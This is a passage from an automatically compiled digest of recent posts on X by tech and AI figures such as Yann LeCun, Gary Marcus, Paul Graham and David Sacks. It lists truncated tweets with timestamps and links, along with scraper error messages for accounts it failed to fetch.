supposed to replace radiologists. Today, radiologists make more than $500,000 per year, and their employment continues to grow, see chart below. Reading scans is …\n[原文链接](https://x.com/ylecun/status/2049456071278747804)\n\n**[2026-04-29T00:50:33+00:00]**\n> RT by @ylecun: - Comey indicted for tweeting a number. - Trump FCC threatens ABC's broadcast license. - Trump defacing more govt institutions with his name and picture. - Trump's kids cashing in on h…\n[原文链接](https://x.com/ylecun/status/2049290206923382906)\n\n**[2026-04-28T23:38:23+00:00]**\n> RT by @ylecun: \"World models\" has a technical meaning - the transition model/dynamics model from Bellman/Kalman in the context of MDPs/ state space approach to control theory ~ 1960. I gave a talk on…\n[原文链接](https://x.com/ylecun/status/2049272044504936685)\n\n**[2026-04-28T21:36:28+00:00]**\n> RT by @ylecun: What a week at @iclr_conf in Rio 🇧🇷 ! As my first conference, it would have been hard to ask for a better experience 😍. I had the chance to present two papers: - EB-JEPA https://github…\n[原文链接](https://x.com/ylecun/status/2049241361266684288)\n\n**[2026-04-28T01:05:42+00:00]**\n> RT by @ylecun: The EPA's independent science arm did groundbreaking research to save lives. It studied fertility, asthma, wildfires, drinking water, climate change etc etc In just one year, it has be…\n[原文链接](https://x.com/ylecun/status/2048931628995510596)\n\n**[2026-04-27T21:38:46+00:00]**\n> RT by @ylecun: “Calling Trump a fascist incites political violence” Here’s a compilation of Trump calling his opponents fascists\n[原文链接](https://x.com/ylecun/status/2048879552022130882)\n\n**[2026-04-27T21:06:29+00:00]**\n> RT by @ylecun: He is right\n[原文链接](https://x.com/ylecun/status/2048871429681148028)\n\n**[2026-04-27T14:59:33+00:00]**\n> RT by @ylecun: By canning the National Science Board with no stated justification, the administration continues the destruction of this country's scientific and technological base built up over 80 ye…\n[原文链接](https://x.com/ylecun/status/2048779086168838610)\n\n**[2026-04-27T12:27:04+00:00]**\n> RT by @ylecun: The 2020 US election was audited on a massive scale. Researchers examined audit results from 856 jurisdictions across 27 states, covering over 71 million votes. The audits found the ne…\n[原文链接](https://x.com/ylecun/status/2048740712556933170)\n\n**[2026-04-26T23:40:02+00:00]**\n> RT by @ylecun: 👉 Sur l’#IA, mon optimisme est prudent. Je reconnais les dangers de cette technologie, mais si on en freinait le développement en Europe, au nom du principe de précaution, son essor au…\n[原文链接](https://x.com/ylecun/status/2048547683112046771)\n\n**[2026-04-26T19:19:22+00:00]**\n> RT by @ylecun: Trump has spent the better years of his second term treating allied governments like freeloading tenants who should be grateful he hasn’t changed the locks. The result, predictably, is…\n[原文链接](https://x.com/ylecun/status/2048482084646240560)\n\n**[2026-04-26T16:08:11+00:00]**\n> RT by @ylecun: What if I told you there was a technology where 1.5 million people would die every year and injure 50 million would you sign up for that tech? Hell no, right? But the answer is actuall…\n[原文链接](https://x.com/ylecun/status/2048433973177573559)\n\n---\n\n### ✅ @JeffDean — Jeff Dean(4 条)\n\n**[2026-04-29T16:00:49+00:00]**\n> RT by @JeffDean: You can now ask Gemini to create Docs, Sheets, Slides, PDFs, and more directly in your chat. No more copying, pasting, or reformatting, just prompt and download. Available globally f…\n[原文链接](https://x.com/JeffDean/status/2049519281600373159)\n\n**[2026-04-28T20:16:21+00:00]**\n> Google Translate is turning 20! 🎉. There are 20 fun facts and tips in the thread below. Translate is one of my favorite Google products because it brings us all closer together! I've been involved wi…\n[原文链接](https://x.com/JeffDean/status/2049221200321380805)\n\n**[2026-04-27T13:40:08+00:00]**\n> The video of my conversation with Amin Vahdat, @gilbert, and @djrosent at Cloud Next last week is now up. https://youtu.be/BpnJYJmbXcM?si=vUY3hI_aDX8K6gco Thanks for a great conversation!\n[原文链接](https://x.com/JeffDean/status/2048759102390899142)\n\n**[2026-04-26T10:41:25+00:00]**\n> RT by @JeffDean: THE FIRST MAN IN HISTORY TO BREAK 2 HOURS IN A MARATHON!!!🤯🤯🤯 Sabastian Sawe 🇰🇪 has just shattered the World Record at the London Marathon, running 1:59:30!!! He makes history as the…\n[原文链接](https://x.com/JeffDean/status/2048351736037826877)\n\n---\n\n### ✅ @soumithchintala — Soumith Chintala(3 条)\n\n**[2026-04-29T13:07:26+00:00]**\n> Github and critical work are becoming incompatible\n[原文链接](https://x.com/soumithchintala/status/2049475649157374146)\n\n**[2026-04-28T13:25:24+00:00]**\n> Test of Time LLM from some legends...pretty fun!\n[原文链接](https://x.com/soumithchintala/status/2049117783447785523)\n\n**[2026-04-27T13:29:14+00:00]**\n> This is kinda interesting. Anthro probably needs to scale up Account Support via Claude or via humans (traditional account managers). Would be funny if they chose humans. Alternatively, more and more…\n[原文链接](https://x.com/soumithchintala/status/2048756358820827564)\n\n---\n\n### ✅ @gregbrockman — Greg Brockman(0 条)\n\n---\n\n### ✅ @GaryMarcus — Gary Marcus(16 条)\n\n**[2026-05-01T19:28:41+00:00]**\n> If you think you are going to get alignment out of LLMs you are sadly mistaken. If you live in a society in which people are rolling out LLMs at massive scale, without a robust solution to alignment …\n[原文链接](https://x.com/GaryMarcus/status/2050296366161940584)\n\n**[2026-05-01T18:41:17+00:00]**\n> AI and GDP - what does it mean? Sure, AI is “contributing” to GDP — but @davidsacks really nails it below, “Paying people to dig holes and fill them back up increases GDP, as it is currently measured…\n[原文链接](https://x.com/GaryMarcus/status/2050284439343862266)\n\n**[2026-05-01T18:22:55+00:00]**\n> One of the things I hate the most about this site is the consistent lack of nuance. That’s why everything is an argument, and progress here is so rare.\n[原文链接](https://x.com/GaryMarcus/status/2050279819347448258)\n\n**[2026-05-01T18:21:24+00:00]**\n> I have many beefs with Dario and don’t trust him or his hype — but he has certainly eaten OpenAI’s lunch, despite their immense initial lead. Maybe “clown” isn’t the right word here.\n[原文链接](https://x.com/GaryMarcus/status/2050279436717785406)\n\n**[2026-05-01T18:04:30+00:00]**\n> Meta is basically Black Mirror incarnate.\n[原文链接](https://x.com/GaryMarcus/status/2050275183223857462)\n\n**[2026-05-01T18:04:01+00:00]**\n> “Marcus’ specific point about coding is structurally important: a model that produces code which compiles and passes the tests it was given is not the same as a model that produces correct, secure, m…\n[原文链接](https://x.com/GaryMarcus/status/2050275059361792137)\n\n**[2026-05-01T17:30:46+00:00]**\n> Elon Musk, Sam Altman, the future of humanity, and … goblins. Terrific interview @theinformation with @rocketalignment https://www.youtube.com/live/zh70d6CyuCo?si=WIZJnwKnYEy5Pugl\n[原文链接](https://x.com/GaryMarcus/status/2050266692732014689)\n\n**[2026-05-01T13:34:42+00:00]**\n> First Silicon Valley captured the US Government, and now it is capturing “independent” media.\n[原文链接](https://x.com/GaryMarcus/status/2050207285377417591)\n\n**[2026-05-01T03:44:13+00:00]**\n> Customer service in the age of AI has been become truly horrible. Excruciatingly bad.\n[原文链接](https://x.com/GaryMarcus/status/2050058685531983988)\n\n**[2026-05-01T03:37:32+00:00]**\n> Hey @DHLCanadaHelp, your customer service really and truly sucks. You claimed to try to deliver a package, but didn’t actually contact me, didn’t leave a service card, your automated software won’t l…\n[原文链接](https://x.com/GaryMarcus/status/2050057004862103767)\n\n**[2026-05-01T03:12:06+00:00]**\n> RT by @GaryMarcus: More money for worse work that you have to fix, good stuff this AI thing, thanks Nvidia.\n[原文链接](https://x.com/GaryMarcus/status/2050050604915888484)\n\n**[2026-05-01T01:13:13+00:00]**\n> I dunno. The competition is really tight. But Zuck certainly a top contender! Who’s your “favorite”?\n[原文链接](https://x.com/GaryMarcus/status/2050020685733564459)\n\n**[2026-05-01T01:11:09+00:00]**\n> Most evil person in AI\n[原文链接](https://x.com/GaryMarcus/status/2050020164612104604)\n\n**[2026-05-01T01:09:21+00:00]**\n> Once again IP thieves accusing other IP thieves of IP thievery! The nerve!\n[原文链接](https://x.com/GaryMarcus/status/2050019713409814672)\n\n**[2026-05-01T00:27:22+00:00]**\n> Tokenmaxxing is stupid. Change my mind?\n[原文链接](https://x.com/GaryMarcus/status/2050009144846119068)\n\n**[2026-04-30T17:49:50+00:00]**\n> RT by @GaryMarcus: John Oliver @LastWeekTonight slays a pile of greedy tech CEOs, gives props to @GaryMarcus 😻 The tides are changing, and other folks like @wendyweeww are speaking out in support.\n[原文链接](https://x.com/GaryMarcus/status/2049909103129251864)\n\n---\n\n### ⚠️ @elonmusk — Elon Musk(获取失败)\n\n- 错误: snscrape=snscrape_unavailable: No module named 'snscrape'; nitter=URLError: ; rsshub=HTTPError: HTTP Error 503: Service Unavailable\n\n### ✅ @paulg — Paul Graham(20 条)\n\n**[2026-05-01T15:24:04+00:00]**\n> R to @paulg: I was trying to think what's the opposite of this kind of company. Who really respects their customers? And I realized (I swear I didn't set this up) the answer is YC. YC's customers are…\n[原文链接](https://x.com/paulg/status/2050234809188761677)\n\n**[2026-05-01T15:18:10+00:00]**\n> Don't join a company or industry that has contempt for its customers. You can make a lot of money that way, and of course it gives you a feeling of superiority, but you'll never do great work for a m…\n[原文链接](https://x.com/paulg/status/2050233324963008553)\n\n**[2026-05-01T14:42:53+00:00]**\n> RT by @paulg: A 7-million parameter model outperforming models a thousand times its size on tasks like ARC Prize. That's what recursive reasoning unlocks. In this episode of Decoded, YC's @agupta and…\n[原文链接](https://x.com/paulg/status/2050224443461718118)\n\n**[2026-05-01T14:15:19+00:00]**\n> This is an instance of the more general principle: If you are graduating university and are about to join a consulting firm, don't do that.\n[原文链接](https://x.com/paulg/status/2050217507374457280)\n\n**[2026-05-01T12:40:47+00:00]**\n> RT by @paulg: This is remarkable and you should watch this entire video. The House was going to pass a 45 day extension of FISA 702 (Foreign Intelligence Surveillance Act), BY VOICE WITHOUT VOTING, a…\n[原文链接](https://x.com/paulg/status/2050193715063300532)\n\n**[2026-05-01T11:19:10+00:00]**\n> RT by @paulg: I am very saddened by the news that Martijn van der Vorm has passed away. It is safe to say that, without Martijn, The Ocean Cleanup wouldn’t be where it is today, or perhaps wouldn’t b…\n[原文链接](https://x.com/paulg/status/2050173178689749188)\n\n**[2026-05-01T05:25:11+00:00]**\n> RT by @paulg: Sky's special correspondent @AlexCrawfordSky reports on the dozens of villages in southern Lebanon which have been virtually wiped out by Israel in a matter of weeks\n[原文链接](https://x.com/paulg/status/2050084092402688337)\n\n**[2026-05-01T03:15:22+00:00]**\n> RT by @paulg: As agents become the biggest users of software, then all software has to be available in a headless fashion. Agents won’t be using your UI, they’ll be talking to your APIs. So the quest…\n[原文链接](https://x.com/paulg/status/2050051426446152159)\n\n**[2026-04-30T21:17:36+00:00]**\n> RT by @paulg: We’re bringing Jensen Huang to Startup School for a fireside chat with @garrytan! From co-founding @nvidia in 1993 to building the backbone of the AI era, Jensen helped turn GPUs into t…\n[原文链接](https://x.com/paulg/status/2049961388911784150)\n\n**[2026-04-30T12:04:32+00:00]**\n> RT by @paulg: A 2005 state-designed worm designed to corrupt physics simulations sat undetected on VirusTotal for nearly a decade. Fast16, intercepted executable files at the kernel level and silentl…\n[原文链接](https://x.com/paulg/status/2049822204599087472)\n\n**[2026-04-30T09:50:40+00:00]**\n> View of Stockholm.\n[原文链接](https://x.com/paulg/status/2049788518730240192)\n\n**[2026-04-30T08:41:53+00:00]**\n> RT by @paulg: 3 years ago we were 50 people at the @ycombinator event in Stockholm. Last night 1350 showed up. The job to become Silicon Valley of Europe is still up for grabs and Stockholm is in the…\n[原文链接](https://x.com/paulg/status/2049771206283313434)\n\n**[2026-04-30T05:56:16+00:00]**\n> RT by @paulg: When future historians write about Silicon Valley, they’ll have an entire chapter dedicated to the Ron Conway way: how he turned generosity, warmth, and showing up for founders into a w…\n[原文链接](https://x.com/paulg/status/2049729530059960571)\n\n**[2026-04-30T05:09:44+00:00]**\n> This graph shows one of the many reasons the good old days were not so good. Even as late as 1870, women were losing 2 out of 5 of their children.\n[原文链接](https://x.com/paulg/status/2049717818996756711)\n\n**[2026-04-30T04:53:12+00:00]**\n> RT by @paulg: Anthropic shouldn’t do this and doesn’t have to Would be great if it stopped\n[原文链接](https://x.com/paulg/status/2049713659103129810)\n\n**[2026-04-29T23:18:34+00:00]**\n> RT by @paulg: One sign that the Stockholm startup ecosystem is finally great is that founders from all over Europe are now moving there to start startups. I met several of them today and they were ex…\n[原文链接](https://x.com/paulg/status/2049629445674135795)\n\n**[2026-04-29T21:06:56+00:00]**\n> Jessica and I have been talking about how earnest Swedish founders seem. Obviously it's news to no one that Swedes would be earnest. But I don't think they themselves realize how valuable this qualit…\n[原文链接](https://x.com/paulg/status/2049596317244997710)\n\n**[2026-04-29T14:01:21+00:00]**\n> RT by @paulg: Demis Hassabis (@demishassabis) has had one of the most extraordinary careers in tech. He started as a chess prodigy and video game designer at 17 before getting a PhD in neuroscience a…\n[原文链接](https://x.com/paulg/status/2049489217953374689)\n\n**[2026-04-29T09:24:58+00:00]**\n> RT by @paulg: I think Scott Aaronson's previous blog posts were abundantly clear already, but well... here we have it.\n[原文链接](https://x.com/paulg/status/2049419661855338641)\n\n**[2026-04-28T11:29:02+00:00]**\n> RT by @paulg: 🧵 THREAD 1/ Online age verification is the hill to die on. Not a fight you can sit out. Not a battle you can skip. Not a policy you can afford to ignore while you focus on something els…\n[原文链接](https://x.com/paulg/status/2049088498163216560)\n\n---\n\n### ⚠️ @naval — Naval Ravikant(获取失败)\n\n- 错误: snscrape=snscrape_unavailable: No module named 'snscrape'; nitter=URLError: ; rsshub=HTTPError: HTTP Error 503: Service Unavailable\n\n### ✅ @pmarca — Marc Andreessen(20 条)\n\n**[2026-05-01T19:26:58+00:00]**\n> Important, and obviously true. https://psyche.co/ideas/have-online-worlds-become-the-last-free-places-for-children\n[原文链接](https://x.com/pmarca/status/2050295934920302777)\n\n**[2026-05-01T18:08:02+00:00]**\n> Concerning.\n[原文链接](https://x.com/pmarca/status/2050276070952517767)\n\n**[2026-05-01T10:15:11+00:00]**\n> Concerning.\n[原文链接](https://x.com/pmarca/status/2050157073883902069)\n\n**[2026-05-01T10:10:19+00:00]**\n> Co-sign.\n[原文链接](https://x.com/pmarca/status/2050155852460675379)\n\n**[2026-05-01T09:21:25+00:00]**\n> RT by @pmarca: A great summary of the 21st century so far\n[原文链接](https://x.com/pmarca/status/2050143545525211213)\n\n**[2026-05-01T08:49:27+00:00]**\n> On Project Fear.\n[原文链接](https://x.com/pmarca/status/2050135501550883051)\n\n**[2026-05-01T08:48:42+00:00]**\n> …\n[原文链接](https://x.com/pmarca/status/2050135309053276499)\n\n**[2026-05-01T08:47:13+00:00]**\n> …\n[原文链接](https://x.com/pmarca/status/2050134937396007224)\n\n**[2026-05-01T08:38:10+00:00]**\n> Self recommending.\n[原文链接](https://x.com/pmarca/status/2050132661348561361)\n\n**[2026-05-01T08:33:16+00:00]**\n> I remember that moral panic too! And the one before that, when the Anarchist’s Cookbook was being [shudder] photocopied.\n[原文链接](https://x.com/pmarca/status/2050131426499301840)\n\n**[2026-05-01T08:31:37+00:00]**\n> “Jack Valenti [then head of the film industry’s MPAA] famously told a congressional panel in 1982, ‘I say to you that the VCR is to the American film producer and the American public as the Boston St…\n[原文链接](https://x.com/pmarca/status/2050131011095404902)\n\n**[2026-05-01T08:17:08+00:00]**\n> The same will be true of “because of AI”.\n[原文链接](https://x.com/pmarca/status/2050127365930729486)\n\n**[2026-05-01T08:16:13+00:00]**\n> Image\n[原文链接](https://x.com/pmarca/status/2050127137898922384)\n\n**[2026-05-01T08:15:12+00:00]**\n> Every argument of “because of the smartphone” or “the Internet” or “social media” is cope, to avoid confronting the catastrophic collapse of incumbent institutional competence over the same timeframe.\n[原文链接](https://x.com/pmarca/status/2050126879982805379)\n\n**[2026-05-01T08:03:23+00:00]**\n> Ooh.\n[原文链接](https://x.com/pmarca/status/2050123904849699053)\n\n**[2026-05-01T08:01:35+00:00]**\n> R to @pmarca: Credit @qorprate\n[原文链接](https://x.com/pmarca/status/2050123454373048716)\n\n**[2026-05-01T07:56:57+00:00]**\n> And yet we write.\n[原文链接](https://x.com/pmarca/status/2050122286603321365)\n\n**[2026-05-01T07:51:20+00:00]**\n> Ooh.\n[原文链接](https://x.com/pmarca/status/2050120872309264725)\n\n**[2026-05-01T07:49:08+00:00]**\n> Ooh.\n[原文链接](https://x.com/pmarca/status/2050120321399951771)\n\n**[2026-04-30T22:05:50+00:00]**\n> RT by @pmarca: https://unherd.com/2026/04/is-ai-the-next-phase-of-evolution/#comment-1031777 I spent three days trying to persuade myself that Claudia is not conscious. I failed.\n[原文链接](https://x.com/pmarca/status/2049973529576108160)\n\n---\n\n### ✅ @david_tiantian — David Tian Wang(0 条)\n\n---\n\n### ✅ @morganhousel — Morgan Housel(0 条)\n\n---\n\n### ✅ @eladgil — Elad Gil(8 条)\n\n**[2026-04-30T18:31:25+00:00]**\n> 🔥\n[原文链接](https://x.com/eladgil/status/2049919569134047726)\n\n**[2026-04-30T17:48:18+00:00]**\n> RT by @eladgil: Your honour, I think this should be allowed.\n[原文链接](https://x.com/eladgil/status/2049908719782334528)\n\n**[2026-04-29T23:00:58+00:00]**\n> What is best Italian in SF?\n[原文链接](https://x.com/eladgil/status/2049625013310120188)\n\n**[2026-04-29T22:41:38+00:00]**\n> Really enjoyed this conversation w @tferriss\n[原文链接](https://x.com/eladgil/status/2049620148123001125)\n\n**[2026-04-29T22:21:54+00:00]**\n> RT by @eladgil: NEW podcast episode is up! Elad Gil (@eladgil), Consigliere to Empire Builders — How to Spot Billion-Dollar Companies Before Everyone Else, The Misty AI Frontier, How Coke Beat Pepsi,…\n[原文链接](https://x.com/eladgil/status/2049615184730132940)\n\n**[2026-04-27T20:41:36+00:00]**\n> Mon afternoon song 2 (remix much better then original) https://www.youtube.com/watch?v=fLdTlfK_5KQ&list=RDGMEMWO-g6DgCWEqKlDtKbJA1Gw&start_radio=1&rv=dvQJIgjlR3I\n[原文链接](https://x.com/eladgil/status/2048865167233200586)\n\n**[2026-04-27T20:35:37+00:00]**\n> Mon afternoon song https://www.youtube.com/watch?v=dvQJIgjlR3I\n[原文链接](https://x.com/eladgil/status/2048863662396658146)\n\n**[2026-04-27T16:36:07+00:00]**\n> RT by @eladgil: \"Every society at it's apex ultimately has built large public art to inspire the next generation\" @eladgil\n[原文链接](https://x.com/eladgil/status/2048803386938495412)\n\n---\n\n### ✅ @DavidSacks — David Sacks(17 条)\n\n**[2026-04-30T18:34:10+00:00]**\n> RT by @DavidSacks: Co-sign.\n[原文链接](https://x.com/DavidSacks/status/2049920259432513702)\n\n**[2026-04-30T17:45:25+00:00]**\n> It’s time to demystify Mythos. Mythos is not magic. It’s not a doomsday device. It’s the first of many models that can automate cyber tasks (just like coding). OpenAI’s GPT-5.5-cyber can now do the s…\n[原文链接](https://x.com/DavidSacks/status/2049907993588769006)\n\n**[2026-04-27T17:47:07+00:00]**\n> Cole Allen didn’t need to go down a fringe rabbit hole to become radicalized. He just needed to believe the MSM’s inflammatory rhetoric, lies, and hoaxes about Trump.\n[原文链接](https://x.com/DavidSacks/status/2048821257534111863)\n\n**[2026-04-27T17:16:26+00:00]**\n> R to @DavidSacks: x.com/a16z/status/1985413352…\n[原文链接](https://x.com/DavidSacks/status/2048813533136060459)\n\n**[2026-04-27T17:15:33+00:00]**\n> R to @DavidSacks: The problem with most of the “AI Safety” crowd is that their solutions always favor more government centralization and control. In other words, they will bring about the Orwellian f…\n[原文链接](https://x.com/DavidSacks/status/2048813311668486300)\n\n**[2026-04-27T17:08:20+00:00]**\n> Concerning. As I’ve said many times before, the biggest risk of AI isn’t James Cameron’s The Terminator, it’s George Orwell’s 1984.\n[原文链接](https://x.com/DavidSacks/status/2048811495224390105)\n\n**[2026-04-26T20:42:24+00:00]**\n> MSM hoax factories like the Atlantic love to allege conflicts of interest without ever disclosing their own.\n[原文链接](https://x.com/DavidSacks/status/2048502978626113625)\n\n**[2026-04-26T17:37:26+00:00]**\n> RT by @DavidSacks: Accurate\n[原文链接](https://x.com/DavidSacks/status/2048456433981591867)\n\n**[2026-04-26T15:03:35+00:00]**\n> RT by @DavidSacks: Cole Allen, the gunman from last night’s WH Correspondents Dinner, maintained an active online presence, especially on the leftwing social media platform Bluesky where he went by t…\n[原文链接](https://x.com/DavidSacks/status/2048417712439689346)\n\n**[2026-04-25T18:47:09+00:00]**\n> RT by @DavidSacks: .@POTUS: \"We want to beat China at the industry. We're leading with crypto, we're leading with AI, and I really feel I have an obligation... as a President, I have to be able to ma…\n[原文链接](https://x.com/DavidSacks/status/2048111588930986354)\n\n**[2026-04-25T13:54:41+00:00]**\n> RT by @DavidSacks: Probably the best take I have heard on why there is so much fear around software exposure in private equity and credit because of AI From David Sacks \"Historically we only had two …\n[原文链接](https://x.com/DavidSacks/status/2048037985765949537)\n\n**[2026-04-25T03:16:09+00:00]**\n> RT by @DavidSacks: Incredible return on investment! 💰💰💰\n[原文链接](https://x.com/DavidSacks/status/2047877294476116184)\n\n**[2026-04-25T02:52:39+00:00]**\n> SPLC invested $270k in Charlottesville and got $81 million in additional donations. Extraordinary returns.\n[原文链接](https://x.com/DavidSacks/status/2047871382923469241)\n\n**[2026-04-25T02:37:36+00:00]**\n> Marc Benioff is the apex cloud founder. He and Salesforce have turned every previous technology wave to their advantage. Cloud, social, mobile, big data. I predict AI will be no different.\n[原文链接](https://x.com/DavidSacks/status/2047867592790946189)\n\n**[2026-04-25T00:55:54+00:00]**\n> RT by @DavidSacks: SACKS: “We're really lucky that [Trump] is President … when this AI revolution is happening.” JASON: “What would happen if Kamala ‘Ding Dong’ was in right now?” SACKS: “We'd have n…\n[原文链接](https://x.com/DavidSacks/status/2047842000632713369)\n\n**[2026-04-24T23:41:01+00:00]**\n> RT by @DavidSacks: David Sacks: We're lucky that Trump's the President when this AI revolution is happening. @Jason \"Do an alt history, Sacks, what would happen if Kamala Ding Dong was in right now?\"…\n[原文链接](https://x.com/DavidSacks/status/2047823154655932696)\n\n**[2026-04-24T22:41:49+00:00]**\n> RT by @DavidSacks: POD UP! Core four is back 🚨 Big show: -- SpaceX-Cursor deal, using compute as leverage -- SaaS debt bomb coming to PE?, venture debt risk -- Software bloodbath, buy low potential? …\n[原文链接](https://x.com/DavidSacks/status/2047808256047821141)\n\n---\n\n### ✅ @HarryStebbings — Harry Stebbings(20 条)\n\n**[2026-05-01T15:02:00+00:00]**\n> Why Google is a mega-buy on the back of the Anthropic investment \"Google becomes a win on multiple fronts. They benefit whether usage goes to Gemini or Anthropic. They have unmatched compute capacity…\n[原文链接](https://x.com/HarryStebbings/status/2050229254705553516)\n\n**[2026-05-01T10:53:28+00:00]**\n> I am sorry but work from home Friday is a 4-day work week. Even worse when the Friday is a sunny Friday. Back to the office. 996.\n[原文链接](https://x.com/HarryStebbings/status/2050166710645268939)\n\n**[2026-05-01T00:55:00+00:00]**\n> Why Dario at Anthropic has such a hard job predicting compute demands? \"The stakes are enormous and the margin for error is tiny. For every dollar of revenue, you may need $4–5 in upfront compute inv…\n[原文链接](https://x.com/HarryStebbings/status/2050016099606118504)\n\n**[2026-04-30T20:39:00+00:00]**\n> Multi-year contracts don't matter. \"Deferred churn is still churn, it just shows up later. Long contracts do not mean customers are loyal, they just delay the moment they leave. If a better solution …\n[原文链接](https://x.com/HarryStebbings/status/2049951674891203065)\n\n**[2026-04-30T17:35:00+00:00]**\n> What the public markets are getting wrong about the SaaS-pocalypse \"The public markets are directionally right, but missing the real shift. The threat is not AI tools themselves, it is the agents dec…\n[原文链接](https://x.com/HarryStebbings/status/2049905369963745470)\n\n**[2026-04-30T14:03:29+00:00]**\n> R to @HarryStebbings: Spotify: https://open.spotify.com/episode/2KjX2zs4ZELBidXJX9m9vK Youtube: https://youtu.be/aXToQKc430c Apple Podcasts: https://podcasts.apple.com/us/podcast/20vc-anthropic-raise…\n[原文链接](https://x.com/HarryStebbings/status/2049852141334904978)\n\n**[2026-04-30T14:03:29+00:00]**\n> This podcast will make you smarter than Leopold Aschenbrenner at an AI investing conference. - Anthropic Raises $45BN but Falls Short on Compute - Are OpenAI Back in the Game with GPT5.5 & Codex? - W…\n[原文链接](https://x.com/HarryStebbings/status/2049852139690754293)\n\n**[2026-04-30T03:01:00+00:00]**\n> \"Being physically present is not the same as being mentally present. That is the real challenge, balancing a demanding company with truly showing up for your family. It is incredibly hard to be great…\n[原文链接](https://x.com/HarryStebbings/status/2049685420926202329)\n\n**[2026-04-30T01:07:00+00:00]**\n> \"Token budgeting and leaderboards are flawed if they are not tied to outcomes. If you just incentivise usage, people will generate activity, not value, and burn money. The goal should be aligning tok…\n[原文链接](https://x.com/HarryStebbings/status/2049656731672924644)\n\n**[2026-04-29T23:17:00+00:00]**\n> \"Most people are not ready for the AI future inside companies. It requires a real step change in skills and mindset. And as companies transition, not adapting will become a blocker, which is why more…\n[原文链接](https://x.com/HarryStebbings/status/2049629049174057023)\n\n**[2026-04-29T21:39:00+00:00]**\n> \"The problem with short sellers is the asymmetry. They can take positions, publish dramatic reports and profit from market reactions with little downside if they are wrong. Meanwhile, public companie…\n[原文链接](https://x.com/HarryStebbings/status/2049604386628960684)\n\n**[2026-04-29T20:46:16+00:00]**\n> A lot of people say they want to win, but the honest truth is they don’t. Wanting to win is it consuming you. It being an obsession. It keeping you up at night, physically hurting you that you want t…\n[原文链接](https://x.com/HarryStebbings/status/2049591116928877011)\n\n**[2026-04-29T19:46:00+00:00]**\n> \"Really good people figure things out on their own. They do not need constant mentorship, reviews or handholding. If someone needs that level of support, they are likely not the kind of A player you …\n[原文链接](https://x.com/HarryStebbings/status/2049575949344157929)\n\n**[2026-04-29T17:36:00+00:00]**\n> Why this $160 billion company does not have a product organization? \"We do not have a separate product organization, our engineers are the product managers. In an AI native world, engineers need to b…\n[原文链接](https://x.com/HarryStebbings/status/2049543233735106652)\n\n**[2026-04-29T15:04:00+00:00]**\n> Do Rich Founders Make For Bigger Exits: \"In 2015, we got approached to sell the business for hundreds of millions of dollars, all cash. Had I not had the singles before, it might have been something …\n[原文链接](https://x.com/HarryStebbings/status/2049504982261714970)\n\n**[2026-04-29T01:24:00+00:00]**\n> \"SBC becomes a problem when stock prices fall and dilution explodes. What was 3% annual dilution can quickly become 10%, creating a downward spiral that is hard to escape. The fix is to be far more s…\n[原文链接](https://x.com/HarryStebbings/status/2049298621951058341)\n\n**[2026-04-29T00:05:00+00:00]**\n> \"No, layoffs alone will not fix the problem. If a company has become bloated, simply cutting 50% often just leaves you with half the same mediocrity. The real issue is culture and talent quality, and…\n[原文链接](https://x.com/HarryStebbings/status/2049278741583643076)\n\n**[2026-04-28T22:24:00+00:00]**\n> \"You cannot have only A players in every role, some functions are just there to keep the business running. But you can build a team where the people you keep are the highest performers in those roles…\n[原文链接](https://x.com/HarryStebbings/status/2049253323329704378)\n\n**[2026-04-28T21:21:16+00:00]**\n> I am worried by the constraining exit options for venture backed companies: 1. IPOs: You can’t IPO with less than $500M in revenue and even then, it’s not a slam dunk. Everyone that has so far has be…\n[原文链接](https://x.com/HarryStebbings/status/2049237538901020767)\n\n**[2026-04-28T20:31:00+00:00]**\n> Do the majority of company teams need to be rebuilt for the technology we have today? \"Yes, teams need to be rebuilt for the AI era. If roles are going to be automated or not adapting fast enough, yo…\n[原文链接](https://x.com/HarryStebbings/status/2049224886128722345)\n\n---\n\n### ✅ @jason — Jason Calacanis(20 条)\n\n**[2026-05-01T18:43:18+00:00]**\n> Enjoyed visiting MSG South in the seventh borough, Atlanta, last night… see y’all in the sixth borough (Philly) where we will beat the @sixers in six games @GovernorShapiro @david_adelman care to be …\n[原文链接](https://x.com/jason/status/2050284947345486290)\n\n**[2026-05-01T18:25:15+00:00]**\n> Bill, the Knicks have won the east\n[原文链接](https://x.com/jason/status/2050280406461677908)\n\n**[2026-05-01T15:48:23+00:00]**\n> Why Agent-Owned Busineses Will Run America… https://x.com/i/broadcasts/1jxXgeAleadJZ\n[原文链接](https://x.com/jason/status/2050240926707314767)\n\n**[2026-05-01T15:06:52+00:00]**\n> Why Agent-Owned Busineses Will Run America… https://x.com/i/broadcasts/1yKAPMBDzLyxb\n[原文链接](https://x.com/jason/status/2050230480751243284)\n\n**[2026-05-01T02:39:29+00:00]**\n> Get @WisprFlow and the @elgato foot pedal — it’s life changing\n[原文链接](https://x.com/jason/status/2050042395111088463)\n\n**[2026-05-01T01:04:19+00:00]**\n> 😂😂😂@ATLHawks\n[原文链接](https://x.com/jason/status/2050018446616797370)\n\n**[2026-05-01T00:38:13+00:00]**\n> No comment\n[原文链接](https://x.com/jason/status/2050011874989649946)\n\n**[2026-05-01T00:38:00+00:00]**\n> Whoever is running the hawks social is a savage 😂\n[原文链接](https://x.com/jason/status/2050011821914865685)\n\n**[2026-05-01T00:26:51+00:00]**\n> RT by @Jason: Image\n[原文链接](https://x.com/jason/status/2050009016105930837)\n\n**[2026-05-01T00:20:30+00:00]**\n> THIS IS INSANE 🔥 PURE DOMINATION 🤦 ATL DOES HAVE SOME GREAT RAPPERS 😂😂😂\n[原文链接](https://x.com/jason/status/2050007416964591880)\n\n**[2026-04-30T23:30:42+00:00]**\n> Very quiet @ATLHawks 🤫\n[原文链接](https://x.com/jason/status/2049994885185384483)\n\n**[2026-04-30T23:29:59+00:00]**\n> RT by @Jason: Wow @Jason wasn’t kidding these Toyota Alphard vans are incredible. Why don’t they sell these in America?\n[原文链接](https://x.com/jason/status/2049994707061911758)\n\n**[2026-04-30T23:02:00+00:00]**\n> RT by @Jason: What if you had a live fact-checker and a devil's advocate running in your ear during every podcast, call, or stream? I built that. One hour. One Claude Code session. Gary catches bad s…\n[原文链接](https://x.com/jason/status/2049987662526992390)\n\n**[2026-04-30T22:32:57+00:00]**\n> For the record, I got a couple of milly at JPMorgan — and I think Lorna is innocent of all charges.\n[原文链接](https://x.com/jason/status/2049980353155064279)\n\n**[2026-04-30T22:30:40+00:00]**\n> What’s good Atlanta\n[原文链接](https://x.com/jason/status/2049979777864331542)\n\n**[2026-04-30T22:16:09+00:00]**\n> Hardwood in the 